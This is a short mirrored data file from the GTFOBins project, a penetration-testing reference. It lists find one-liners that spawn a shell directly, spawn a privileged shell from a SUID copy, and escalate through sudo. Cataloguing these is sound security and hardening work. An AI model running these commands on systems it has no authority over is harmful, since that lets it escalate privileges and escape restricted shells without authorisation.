1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-20 23:01:33 +01:00
GTFOBins.github.io/_gtfobins/find.md
2018-10-05 18:55:38 +01:00

10 lines
180 B
Markdown

---
functions:
shell:
- code: find . -exec /bin/sh \; -quit
suid:
- code: ./find . -exec /bin/sh -p \; -quit
sudo:
- code: sudo find . -exec /bin/sh \; -quit
---